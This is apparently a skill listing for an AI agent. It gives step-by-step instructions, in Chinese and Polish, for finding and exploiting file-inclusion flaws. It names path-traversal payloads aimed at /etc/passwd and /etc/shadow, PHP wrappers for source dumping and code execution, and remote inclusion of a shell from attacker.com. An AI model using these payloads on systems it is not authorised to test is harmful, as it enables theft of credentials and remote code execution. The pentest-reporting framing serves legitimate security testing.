Installation
Pick a client and clone the repository into its skills directory.
Installation
About this skill
文件包含漏洞检测与利用。当目标存在文件读取、页面包含、模板加载、语言切换功能时使用。包括 LFI、RFI、路径遍历。
How to use
Zidentyfikuj parametry podatne na włączanie plików — szukaj parametrów takich jak file=, page=, path=, template=, lang= lub include= w aplikacji docelowej. Zwróć uwagę na funkcje przełączania języka, pobierania dokumentów, podglądu obrazów lub ładowania szablonów.
Przeprowadź test path traversal, wysyłając żądania z sekwencjami ../../../ lub ich wariantami (....// lub kodowanymi %2f) w celu dostępu do plików systemowych takich jak /etc/passwd lub /etc/shadow na systemach Linux, bądź C:\Windows\win.ini na Windows.
Testuj bezwzględne ścieżki dostępu, jeśli path traversal nie zadziała — spróbuj bezpośrednich ścieżek do plików systemowych, logów aplikacji (/var/log/apache2/access.log) lub zmiennych środowiska (/proc/self/environ).
Jeśli aplikacja obsługuje PHP, wykorzystaj pseudo-protokoły — php://filter/convert.base64-encode/resource=index.php do odczytania kodu źródłowego w Base64, lub php://input do wykonania własnego kodu PHP przesłanego w treści żądania POST.
Testuj zdalne włączanie plików (RFI), jeśli aplikacja zezwala na zewnętrzne adresy URL — spróbuj dołączyć plik ze swojego serwera (http://attacker.com/shell.txt) lub użyj data:// URI z zakodowanym kodem PHP.
Dokumentuj wszystkie znalezione podatności, w tym dokładne parametry, payload'y, które zadziałały, oraz odczytane lub wykonane zawartości — te informacje będą niezbędne do raportowania luki.